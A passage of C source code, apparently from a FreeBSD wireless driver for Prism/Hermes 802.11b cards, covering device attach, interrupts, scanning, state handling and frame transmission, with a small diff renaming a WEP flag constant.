WI_INTERSIL }, { WI_NIC_P2_SST_ID, WI_NIC_P2_SST_STR, WI_INTERSIL }, { WI_NIC_EVB2_SST_ID, WI_NIC_EVB2_SST_STR, WI_INTERSIL }, { WI_NIC_3842_EVA_ID, WI_NIC_3842_EVA_STR, WI_INTERSIL }, { WI_NIC_3842_PCMCIA_AMD_ID, WI_NIC_3842_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_3842_PCMCIA_SST_ID, WI_NIC_3842_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_3842_PCMCIA_ATL_ID, WI_NIC_3842_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_3842_PCMCIA_ATS_ID, WI_NIC_3842_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_3842_MINI_AMD_ID, WI_NIC_3842_MINI_STR, WI_INTERSIL }, { WI_NIC_3842_MINI_SST_ID, WI_NIC_3842_MINI_STR, WI_INTERSIL }, { WI_NIC_3842_MINI_ATL_ID, WI_NIC_3842_MINI_STR, WI_INTERSIL }, { WI_NIC_3842_MINI_ATS_ID, WI_NIC_3842_MINI_STR, WI_INTERSIL }, { WI_NIC_3842_PCI_AMD_ID, WI_NIC_3842_PCI_STR, WI_INTERSIL }, { WI_NIC_3842_PCI_SST_ID, WI_NIC_3842_PCI_STR, WI_INTERSIL }, { WI_NIC_3842_PCI_ATS_ID, WI_NIC_3842_PCI_STR, WI_INTERSIL }, { WI_NIC_3842_PCI_ATL_ID, WI_NIC_3842_PCI_STR, WI_INTERSIL }, { WI_NIC_P3_PCMCIA_AMD_ID, WI_NIC_P3_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_P3_PCMCIA_SST_ID, WI_NIC_P3_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_P3_PCMCIA_ATL_ID, WI_NIC_P3_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_P3_PCMCIA_ATS_ID, WI_NIC_P3_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_P3_MINI_AMD_ID, WI_NIC_P3_MINI_STR, WI_INTERSIL }, { WI_NIC_P3_MINI_SST_ID, WI_NIC_P3_MINI_STR, WI_INTERSIL }, { WI_NIC_P3_MINI_ATL_ID, WI_NIC_P3_MINI_STR, WI_INTERSIL }, { WI_NIC_P3_MINI_ATS_ID, WI_NIC_P3_MINI_STR, WI_INTERSIL }, { 0, NULL, 0 }, }; static char *wi_firmware_names[] = { "none", "Hermes", "Intersil", "Symbol" }; devclass_t wi_devclass; int wi_attach(device_t dev) { struct wi_softc *sc = device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; int i, nrates, buflen; u_int16_t val; u_int8_t ratebuf[2 + IEEE80211_RATE_SIZE]; struct ieee80211_rateset *rs; struct sysctl_ctx_list *sctx; struct sysctl_oid *soid; static const u_int8_t empty_macaddr[IEEE80211_ADDR_LEN] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; int error; uint8_t macaddr[IEEE80211_ADDR_LEN]; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc\n"); wi_free(dev); return ENOSPC; } ic = ifp->if_l2com; sc->sc_firmware_type = WI_NOTYPE; sc->wi_cmd_count = 500; /* Reset the NIC. */ if (wi_reset(sc) != 0) { wi_free(dev); return ENXIO; /* XXX */ } /* Read NIC identification */ wi_read_nicid(sc); switch (sc->sc_firmware_type) { case WI_LUCENT: if (sc->sc_sta_firmware_ver < 60006) goto reject; break; case WI_INTERSIL: if (sc->sc_sta_firmware_ver < 800) goto reject; break; default: reject: device_printf(dev, "Sorry, this card is not supported " "(type %d, firmware ver %d)\n", sc->sc_firmware_type, sc->sc_sta_firmware_ver); wi_free(dev); return EOPNOTSUPP; } /* Export info about the device via sysctl */ sctx = device_get_sysctl_ctx(dev); soid = device_get_sysctl_tree(dev); SYSCTL_ADD_STRING(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "firmware_type", CTLFLAG_RD, wi_firmware_names[sc->sc_firmware_type], 0, "Firmware type string"); SYSCTL_ADD_INT(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "sta_version", CTLFLAG_RD, &sc->sc_sta_firmware_ver, 0, "Station Firmware version"); if (sc->sc_firmware_type == WI_INTERSIL) SYSCTL_ADD_INT(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "pri_version", CTLFLAG_RD, &sc->sc_pri_firmware_ver, 0, "Primary Firmware version"); SYSCTL_ADD_UINT(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "nic_id", CTLFLAG_RD, &sc->sc_nic_id, 0, "NIC id"); SYSCTL_ADD_STRING(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "nic_name", CTLFLAG_RD, sc->sc_nic_name, 0, "NIC name"); mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); callout_init_mtx(&sc->sc_watchdog, &sc->sc_mtx, 0); /* * Read the station address. * And do it twice. I've seen PRISM-based cards that return * an error when trying to read it the first time, which causes * the probe to fail. */ buflen = IEEE80211_ADDR_LEN; error = wi_read_rid(sc, WI_RID_MAC_NODE, macaddr, &buflen); if (error != 0) { buflen = IEEE80211_ADDR_LEN; error = wi_read_rid(sc, WI_RID_MAC_NODE, macaddr, &buflen); } if (error || IEEE80211_ADDR_EQ(macaddr, empty_macaddr)) { if (error != 0) device_printf(dev, "mac read failed %d\n", error); else { device_printf(dev, "mac read failed (all zeros)\n"); error = ENXIO; } wi_free(dev); return (error); } ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_ioctl = wi_ioctl; ifp->if_start = wi_start; ifp->if_init = wi_init; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_DS; ic->ic_opmode = IEEE80211_M_STA; ic->ic_caps = IEEE80211_C_STA | IEEE80211_C_PMGT | IEEE80211_C_MONITOR ; /* * Query the card for available channels and setup the * channel table. We assume these are all 11b channels. */ buflen = sizeof(val); if (wi_read_rid(sc, WI_RID_CHANNEL_LIST, &val, &buflen) != 0) val = htole16(0x1fff); /* assume 1-11 */ KASSERT(val != 0, ("wi_attach: no available channels listed!")); val <<= 1; /* shift for base 1 indices */ for (i = 1; i < 16; i++) { struct ieee80211_channel *c; if (!isset((u_int8_t*)&val, i)) continue; c = &ic->ic_channels[ic->ic_nchans++]; c->ic_freq = ieee80211_ieee2mhz(i, IEEE80211_CHAN_B); c->ic_flags = IEEE80211_CHAN_B; c->ic_ieee = i; /* XXX txpowers? */ } /* * Set flags based on firmware version. */ switch (sc->sc_firmware_type) { case WI_LUCENT: sc->sc_ntxbuf = 1; ic->ic_caps |= IEEE80211_C_IBSS; sc->sc_ibss_port = WI_PORTTYPE_BSS; sc->sc_monitor_port = WI_PORTTYPE_ADHOC; sc->sc_min_rssi = WI_LUCENT_MIN_RSSI; sc->sc_max_rssi = WI_LUCENT_MAX_RSSI; sc->sc_dbm_offset = WI_LUCENT_DBM_OFFSET; break; case WI_INTERSIL: sc->sc_ntxbuf = WI_NTXBUF; sc->sc_flags |= WI_FLAGS_HAS_FRAGTHR | WI_FLAGS_HAS_ROAMING; /* * Old firmware are slow, so give peace a chance. */ if (sc->sc_sta_firmware_ver < 10000) sc->wi_cmd_count = 5000; if (sc->sc_sta_firmware_ver > 10101) sc->sc_flags |= WI_FLAGS_HAS_DBMADJUST; ic->ic_caps |= IEEE80211_C_IBSS; /* * version 0.8.3 and newer are the only ones that are known * to currently work. Earlier versions can be made to work, * at least according to the Linux driver but we require * monitor mode so this is irrelevant. */ ic->ic_caps |= IEEE80211_C_HOSTAP; if (sc->sc_sta_firmware_ver >= 10603) sc->sc_flags |= WI_FLAGS_HAS_ENHSECURITY; if (sc->sc_sta_firmware_ver >= 10700) { /* * 1.7.0+ have the necessary support for sta mode WPA. */ sc->sc_flags |= WI_FLAGS_HAS_WPASUPPORT; ic->ic_caps |= IEEE80211_C_WPA; } sc->sc_ibss_port = WI_PORTTYPE_IBSS; sc->sc_monitor_port = WI_PORTTYPE_APSILENT; sc->sc_min_rssi = WI_PRISM_MIN_RSSI; sc->sc_max_rssi = WI_PRISM_MAX_RSSI; sc->sc_dbm_offset = WI_PRISM_DBM_OFFSET; break; } /* * Find out if we support WEP on this card. */ buflen = sizeof(val); if (wi_read_rid(sc, WI_RID_WEP_AVAIL, &val, &buflen) == 0 && val != htole16(0)) ic->ic_cryptocaps |= IEEE80211_CRYPTO_WEP; /* Find supported rates. */ buflen = sizeof(ratebuf); rs = &ic->ic_sup_rates[IEEE80211_MODE_11B]; if (wi_read_rid(sc, WI_RID_DATA_RATES, ratebuf, &buflen) == 0) { nrates = le16toh(*(u_int16_t *)ratebuf); if (nrates > IEEE80211_RATE_MAXSIZE) nrates = IEEE80211_RATE_MAXSIZE; rs->rs_nrates = 0; for (i = 0; i < nrates; i++) if (ratebuf[2+i]) rs->rs_rates[rs->rs_nrates++] = ratebuf[2+i]; } else { /* XXX fallback on error? */ } buflen = sizeof(val); if ((sc->sc_flags & WI_FLAGS_HAS_DBMADJUST) && wi_read_rid(sc, WI_RID_DBM_ADJUST, &val, &buflen) == 0) { sc->sc_dbm_offset = le16toh(val); } sc->sc_portnum = WI_DEFAULT_PORT; ieee80211_ifattach(ic, macaddr); ic->ic_raw_xmit = wi_raw_xmit; ic->ic_scan_start = wi_scan_start; ic->ic_scan_end = wi_scan_end; ic->ic_set_channel = wi_set_channel; ic->ic_vap_create = wi_vap_create; ic->ic_vap_delete = wi_vap_delete; ic->ic_update_mcast = wi_update_mcast; ic->ic_update_promisc = wi_update_promisc; ieee80211_radiotap_attach(ic, &sc->sc_tx_th.wt_ihdr, sizeof(sc->sc_tx_th), WI_TX_RADIOTAP_PRESENT, &sc->sc_rx_th.wr_ihdr, sizeof(sc->sc_rx_th), WI_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET | INTR_MPSAFE, NULL, wi_intr, sc, &sc->wi_intrhand); if (error) { device_printf(dev, "bus_setup_intr() failed! (%d)\n", error); ieee80211_ifdetach(ic); if_free(sc->sc_ifp); wi_free(dev); return error; } return (0); } int wi_detach(device_t dev) { struct wi_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; WI_LOCK(sc); /* check if device was removed */ sc->wi_gone |= !bus_child_present(dev); wi_stop_locked(sc, 0); WI_UNLOCK(sc); ieee80211_ifdetach(ic); bus_teardown_intr(dev, sc->irq, sc->wi_intrhand); if_free(sc->sc_ifp); wi_free(dev); mtx_destroy(&sc->sc_mtx); return (0); } static struct ieee80211vap * wi_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct wi_softc *sc = ic->ic_ifp->if_softc; struct wi_vap *wvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; wvp = (struct wi_vap *) malloc(sizeof(struct wi_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (wvp == NULL) return NULL; vap = &wvp->wv_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); vap->iv_max_aid = WI_MAX_AID; switch (opmode) { case IEEE80211_M_STA: sc->sc_porttype = WI_PORTTYPE_BSS; wvp->wv_newstate = vap->iv_newstate; vap->iv_newstate = wi_newstate_sta; /* need to filter mgt frames to avoid confusing state machine */ wvp->wv_recv_mgmt = vap->iv_recv_mgmt; vap->iv_recv_mgmt = wi_recv_mgmt; break; case IEEE80211_M_IBSS: sc->sc_porttype = sc->sc_ibss_port; wvp->wv_newstate = vap->iv_newstate; vap->iv_newstate = wi_newstate_sta; break; case IEEE80211_M_AHDEMO: sc->sc_porttype = WI_PORTTYPE_ADHOC; break; case IEEE80211_M_HOSTAP: sc->sc_porttype = WI_PORTTYPE_HOSTAP; wvp->wv_newstate = vap->iv_newstate; vap->iv_newstate = wi_newstate_hostap; break; case IEEE80211_M_MONITOR: sc->sc_porttype = sc->sc_monitor_port; break; default: break; } /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, wi_media_status); ic->ic_opmode = opmode; return vap; } static void wi_vap_delete(struct ieee80211vap *vap) { struct wi_vap *wvp = WI_VAP(vap); ieee80211_vap_detach(vap); free(wvp, M_80211_VAP); } int wi_shutdown(device_t dev) { struct wi_softc *sc = device_get_softc(dev); wi_stop(sc, 1); return (0); } void wi_intr(void *arg) { struct wi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; u_int16_t status; WI_LOCK(sc); if (sc->wi_gone || !sc->sc_enabled || (ifp->if_flags & IFF_UP) == 0) { CSR_WRITE_2(sc, WI_INT_EN, 0); CSR_WRITE_2(sc, WI_EVENT_ACK, 0xFFFF); WI_UNLOCK(sc); return; } /* Disable interrupts. */ CSR_WRITE_2(sc, WI_INT_EN, 0); status = CSR_READ_2(sc, WI_EVENT_STAT); if (status & WI_EV_RX) wi_rx_intr(sc); if (status & WI_EV_ALLOC) wi_tx_intr(sc); if (status & WI_EV_TX_EXC) wi_tx_ex_intr(sc); if (status & WI_EV_INFO) wi_info_intr(sc); if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_DRV_IS_EMPTY(&ifp->if_snd)) wi_start_locked(ifp); /* Re-enable interrupts. */ CSR_WRITE_2(sc, WI_INT_EN, WI_INTRS); WI_UNLOCK(sc); return; } static void wi_enable(struct wi_softc *sc) { /* Enable interrupts */ CSR_WRITE_2(sc, WI_INT_EN, WI_INTRS); /* enable port */ wi_cmd(sc, WI_CMD_ENABLE | sc->sc_portnum, 0, 0, 0); sc->sc_enabled = 1; } static int wi_setup_locked(struct wi_softc *sc, int porttype, int mode, uint8_t mac[IEEE80211_ADDR_LEN]) { int i; wi_reset(sc); wi_write_val(sc, WI_RID_PORTTYPE, porttype); wi_write_val(sc, WI_RID_CREATE_IBSS, mode); wi_write_val(sc, WI_RID_MAX_DATALEN, 2304); /* XXX IEEE80211_BPF_NOACK wants 0 */ wi_write_val(sc, WI_RID_ALT_RETRY_CNT, 2); if (sc->sc_flags & WI_FLAGS_HAS_ROAMING) wi_write_val(sc, WI_RID_ROAMING_MODE, 3); /* NB: disabled */ wi_write_rid(sc, WI_RID_MAC_NODE, mac, IEEE80211_ADDR_LEN); /* Allocate fids for the card */ sc->sc_buflen = IEEE80211_MAX_LEN + sizeof(struct wi_frame); for (i = 0; i < sc->sc_ntxbuf; i++) { int error = wi_alloc_fid(sc, sc->sc_buflen, &sc->sc_txd[i].d_fid); if (error) { device_printf(sc->sc_dev, "tx buffer allocation failed (error %u)\n", error); return error; } sc->sc_txd[i].d_len = 0; } sc->sc_txcur = sc->sc_txnext = 0; return 0; } static void wi_init_locked(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int wasenabled; WI_LOCK_ASSERT(sc); wasenabled = sc->sc_enabled; if (wasenabled) wi_stop_locked(sc, 1); if (wi_setup_locked(sc, sc->sc_porttype, 3, IF_LLADDR(ifp)) != 0) { if_printf(ifp, "interface not running\n"); wi_stop_locked(sc, 1); return; } ifp->if_drv_flags |= IFF_DRV_RUNNING; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; callout_reset(&sc->sc_watchdog, hz, wi_watchdog, sc); wi_enable(sc); /* Enable desired port */ } void wi_init(void *arg) { struct wi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; WI_LOCK(sc); wi_init_locked(sc); WI_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void wi_stop_locked(struct wi_softc *sc, int disable) { struct ifnet *ifp = sc->sc_ifp; WI_LOCK_ASSERT(sc); if (sc->sc_enabled && !sc->wi_gone) { CSR_WRITE_2(sc, WI_INT_EN, 0); wi_cmd(sc, WI_CMD_DISABLE | sc->sc_portnum, 0, 0, 0); if (disable) sc->sc_enabled = 0; } else if (sc->wi_gone && disable) /* gone --> not enabled */ sc->sc_enabled = 0; callout_stop(&sc->sc_watchdog); sc->sc_tx_timer = 0; sc->sc_false_syns = 0; ifp->if_drv_flags &= ~(IFF_DRV_OACTIVE | IFF_DRV_RUNNING); } void wi_stop(struct wi_softc *sc, int disable) { WI_LOCK(sc); wi_stop_locked(sc, disable); WI_UNLOCK(sc); } static void wi_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct wi_softc *sc = ifp->if_softc; DPRINTF(("%s: channel %d, %sscanning\n", __func__, ieee80211_chan2ieee(ic, ic->ic_curchan), ic->ic_flags & IEEE80211_F_SCAN ? "" : "!")); WI_LOCK(sc); wi_write_val(sc, WI_RID_OWN_CHNL, ieee80211_chan2ieee(ic, ic->ic_curchan)); WI_UNLOCK(sc); } static void wi_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct wi_softc *sc = ifp->if_softc; struct ieee80211_scan_state *ss = ic->ic_scan; DPRINTF(("%s\n", __func__)); WI_LOCK(sc); /* * Switch device to monitor mode. */ wi_write_val(sc, WI_RID_PORTTYPE, sc->sc_monitor_port); if (sc->sc_firmware_type == WI_INTERSIL) { wi_cmd(sc, WI_CMD_DISABLE | WI_PORT0, 0, 0, 0); wi_cmd(sc, WI_CMD_ENABLE | WI_PORT0, 0, 0, 0); } /* force full dwell time to compensate for firmware overhead */ ss->ss_mindwell = ss->ss_maxdwell = msecs_to_ticks(400); WI_UNLOCK(sc); } static void wi_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct wi_softc *sc = ifp->if_softc; DPRINTF(("%s: restore port type %d\n", __func__, sc->sc_porttype)); WI_LOCK(sc); wi_write_val(sc, WI_RID_PORTTYPE, sc->sc_porttype); if (sc->sc_firmware_type == WI_INTERSIL) { wi_cmd(sc, WI_CMD_DISABLE | WI_PORT0, 0, 0, 0); wi_cmd(sc, WI_CMD_ENABLE | WI_PORT0, 0, 0, 0); } WI_UNLOCK(sc); } static void wi_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m, int subtype, int rssi, int nf) { struct ieee80211vap *vap = ni->ni_vap; switch (subtype) { case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: /* NB: filter frames that trigger state changes */ return; } WI_VAP(vap)->wv_recv_mgmt(ni, m, subtype, rssi, nf); } static int wi_newstate_sta(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct ieee80211_node *bss; struct wi_softc *sc = ifp->if_softc; DPRINTF(("%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate])); if (nstate == IEEE80211_S_AUTH) { WI_LOCK(sc); wi_setup_locked(sc, WI_PORTTYPE_BSS, 3, vap->iv_myaddr); if (vap->iv_flags & IEEE80211_F_PMGTON) { wi_write_val(sc, WI_RID_MAX_SLEEP, ic->ic_lintval); wi_write_val(sc, WI_RID_PM_ENABLED, 1); } wi_write_val(sc, WI_RID_RTS_THRESH, vap->iv_rtsthreshold); if (sc->sc_flags & WI_FLAGS_HAS_FRAGTHR) wi_write_val(sc, WI_RID_FRAG_THRESH, vap->iv_fragthreshold); wi_write_txrate(sc, vap); bss = vap->iv_bss; wi_write_ssid(sc, WI_RID_DESIRED_SSID, bss->ni_essid, bss->ni_esslen); wi_write_val(sc, WI_RID_OWN_CHNL, ieee80211_chan2ieee(ic, bss->ni_chan)); /* Configure WEP. */ if (ic->ic_cryptocaps & IEEE80211_CRYPTO_WEP) wi_write_wep(sc, vap); else sc->sc_encryption = 0; if ((sc->sc_flags & WI_FLAGS_HAS_WPASUPPORT) && (vap->iv_flags & IEEE80211_F_WPA)) { wi_write_val(sc, WI_RID_WPA_HANDLING, 1); if (vap->iv_appie_wpa != NULL) wi_write_appie(sc, WI_RID_WPA_DATA, vap->iv_appie_wpa); } wi_enable(sc); /* enable port */ /* Lucent firmware does not support the JOIN RID. */ if (sc->sc_firmware_type == WI_INTERSIL) { struct wi_joinreq join; memset(&join, 0, sizeof(join)); IEEE80211_ADDR_COPY(&join.wi_bssid, bss->ni_bssid); join.wi_chan = htole16( ieee80211_chan2ieee(ic, bss->ni_chan)); wi_write_rid(sc, WI_RID_JOIN_REQ, &join, sizeof(join)); } WI_UNLOCK(sc); /* * NB: don't go through 802.11 layer, it'll send auth frame; * instead we drive the state machine from the link status * notification we get on association. */ vap->iv_state = nstate; return (0); } return WI_VAP(vap)->wv_newstate(vap, nstate, arg); } static int wi_newstate_hostap(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct ieee80211_node *bss; struct wi_softc *sc = ifp->if_softc; int error; DPRINTF(("%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate])); error = WI_VAP(vap)->wv_newstate(vap, nstate, arg); if (error == 0 && nstate == IEEE80211_S_RUN) { WI_LOCK(sc); wi_setup_locked(sc, WI_PORTTYPE_HOSTAP, 0, vap->iv_myaddr); bss = vap->iv_bss; wi_write_ssid(sc, WI_RID_OWN_SSID, bss->ni_essid, bss->ni_esslen); wi_write_val(sc, WI_RID_OWN_CHNL, ieee80211_chan2ieee(ic, bss->ni_chan)); wi_write_val(sc, WI_RID_BASIC_RATE, 0x3); wi_write_val(sc, WI_RID_SUPPORT_RATE, 0xf); wi_write_txrate(sc, vap); wi_write_val(sc, WI_RID_OWN_BEACON_INT, bss->ni_intval); wi_write_val(sc, WI_RID_DTIM_PERIOD, vap->iv_dtim_period); wi_write_val(sc, WI_RID_RTS_THRESH, vap->iv_rtsthreshold); if (sc->sc_flags & WI_FLAGS_HAS_FRAGTHR) wi_write_val(sc, WI_RID_FRAG_THRESH, vap->iv_fragthreshold); if ((sc->sc_flags & WI_FLAGS_HAS_ENHSECURITY) && (vap->iv_flags & IEEE80211_F_HIDESSID)) { /* * bit 0 means hide SSID in beacons, * bit 1 means don't respond to bcast probe req */ wi_write_val(sc, WI_RID_ENH_SECURITY, 0x3); } if ((sc->sc_flags & WI_FLAGS_HAS_WPASUPPORT) && (vap->iv_flags & IEEE80211_F_WPA) && vap->iv_appie_wpa != NULL) wi_write_appie(sc, WI_RID_WPA_DATA, vap->iv_appie_wpa); wi_write_val(sc, WI_RID_PROMISC, 0); /* Configure WEP. */ if (ic->ic_cryptocaps & IEEE80211_CRYPTO_WEP) wi_write_wep(sc, vap); else sc->sc_encryption = 0; wi_enable(sc); /* enable port */ WI_UNLOCK(sc); } return error; } static void wi_start_locked(struct ifnet *ifp) { struct wi_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct ieee80211_frame *wh; struct mbuf *m0; struct ieee80211_key *k; struct wi_frame frmhdr; const struct llc *llc; int cur; WI_LOCK_ASSERT(sc); if (sc->wi_gone) return; memset(&frmhdr, 0, sizeof(frmhdr)); cur = sc->sc_txnext; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m0); if (m0 == NULL) break; if (sc->sc_txd[cur].d_len != 0) { IFQ_DRV_PREPEND(&ifp->if_snd, m0); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m0->m_pkthdr.rcvif; /* reconstruct 802.3 header */ wh = mtod(m0, struct ieee80211_frame *); switch (wh->i_fc[1]) { case IEEE80211_FC1_DIR_TODS: IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_shost, wh->i_addr2); IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_dhost, wh->i_addr3); break; case IEEE80211_FC1_DIR_NODS: IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_shost, wh->i_addr2); IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_dhost, wh->i_addr1); break; case IEEE80211_FC1_DIR_FROMDS: IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_shost, wh->i_addr3); IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_dhost, wh->i_addr1); break; } llc = (const struct llc *)( mtod(m0, const uint8_t *) + ieee80211_hdrsize(wh)); frmhdr.wi_ehdr.ether_type = llc->llc_snap.ether_type; frmhdr.wi_tx_ctl = htole16(WI_ENC_TX_802_11|WI_TXCNTL_TX_EX); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { ieee80211_free_node(ni); m_freem(m0); continue; } frmhdr.wi_tx_ctl |= htole16(WI_TXCNTL_NOCRYPT); } if (ieee80211_radiotap_active_vap(ni->ni_vap)) { sc->sc_tx_th.wt_rate = ni->ni_txrate; ieee80211_radiotap_tx(ni->ni_vap, m0); } m_copydata(m0, 0, sizeof(struct ieee80211_frame), (caddr_t)&frmhdr.wi_whdr); m_adj(m0, sizeof(struct ieee80211_frame)); frmhdr.wi_dat_len = htole16(m0->m_pkthdr.len); ieee80211_free_node(ni); if (wi_start_tx(ifp, &frmhdr, m0)) continue; sc->sc_txnext = cur = (cur + 1) % sc->sc_ntxbuf; ifp->if_opackets++; } } static void wi_start(struct ifnet *ifp) { struct wi_softc *sc = ifp->if_softc; WI_LOCK(sc); wi_start_locked(ifp); WI_UNLOCK(sc); } static int wi_start_tx(struct ifnet *ifp, struct wi_frame *frmhdr, struct mbuf *m0) { struct wi_softc *sc = ifp->if_softc; int cur = sc->sc_txnext; int fid, off, error; fid = sc->sc_txd[cur].d_fid; off = sizeof(*frmhdr); error = wi_write_bap(sc, fid, 0, frmhdr, sizeof(*frmhdr)) != 0 || wi_mwrite_bap(sc, fid, off, m0, m0->m_pkthdr.len) != 0; m_freem(m0); if (error) { ifp->if_oerrors++; return -1; } sc->sc_txd[cur].d_len = off; if (sc->sc_txcur == cur) { if (wi_cmd(sc, WI_CMD_TX | WI_RECLAIM, fid, 0, 0)) { if_printf(ifp, "xmit failed\n"); sc->sc_txd[cur].d_len = 0; return -1; } sc->sc_tx_timer = 5; } return 0; } static int wi_raw_xmit(struct ieee80211_node *ni, struct mbuf *m0, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct ieee80211vap *vap = ni->ni_vap; struct wi_softc *sc = ifp->if_softc; struct ieee80211_key *k; struct ieee80211_frame *wh; struct wi_frame frmhdr; int cur; int rc = 0; WI_LOCK(sc); if (sc->wi_gone) { rc = ENETDOWN; goto out; } memset(&frmhdr, 0, sizeof(frmhdr)); cur = sc->sc_txnext; if (sc->sc_txd[cur].d_len != 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; rc = ENOBUFS; goto out; } m0->m_pkthdr.rcvif = NULL; m_copydata(m0, 4, ETHER_ADDR_LEN * 2, (caddr_t)&frmhdr.wi_ehdr); frmhdr.wi_ehdr.ether_type = 0; wh = mtod(m0, struct ieee80211_frame *); frmhdr.wi_tx_ctl = htole16(WI_ENC_TX_802_11|WI_TXCNTL_TX_EX); if (params && (params->ibp_flags & IEEE80211_BPF_NOACK)) frmhdr.wi_tx_ctl |= htole16(WI_TXCNTL_ALTRTRY); - if ((wh->i_fc[1] & IEEE80211_FC1_WEP) && + if ((wh->i_fc[1] & IEEE80211_FC1_PROTECTED) && (!params || (params && (params->ibp_flags & IEEE80211_BPF_CRYPTO)))) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { rc = ENOMEM; goto out; } frmhdr.wi_tx_ctl |= htole16(WI_TXCNTL_NOCRYPT); } if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_rate = ni->ni_txrate; ieee80211_radiotap_tx(vap, m0); } m_copydata(m0, 0, sizeof(struct ieee80211_frame), (caddr_t)&frmhdr.wi_whdr); m_adj(m0, sizeof(struct ieee80211_frame)); frmhdr.wi_dat_len = htole16(m0->m_pkthdr.len); if (wi_start_tx(ifp, &frmhdr, m0) < 0) { m0 = NULL; rc = EIO; goto out; } m0 = NULL; sc->sc_txnext = cur = (cur + 1) % sc->sc_ntxbuf; out: WI_UNLOCK(sc); if (m0 != NULL) m_freem(m0); ieee80211_free_node(ni); return rc; } static int wi_reset(struct wi_softc *sc) { #define WI_INIT_TRIES 3 int i, error = 0; for (i = 0; i < WI_INIT_TRIES; i++) { error = wi_cmd(sc, WI_CMD_INI, 0, 0, 0); if (error == 0) break; DELAY(WI_DELAY * 1000); } sc->sc_reset = 1; if (i == WI_INIT_TRIES) { if_printf(sc->sc_ifp, "reset failed\n"); return error; } CSR_WRITE_2(sc, WI_INT_EN, 0); CSR_WRITE_2(sc, WI_EVENT_ACK, 0xFFFF); /* Calibrate timer. */ wi_write_val(sc, WI_RID_TICK_TIME, 8); return 0; #undef WI_INIT_TRIES } static void wi_watchdog(void *arg) { struct wi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; WI_LOCK_ASSERT(sc); if (!sc->sc_enabled) return; if (sc->sc_tx_timer && --sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); ifp->if_oerrors++; wi_init_locked(ifp->if_softc); return; } 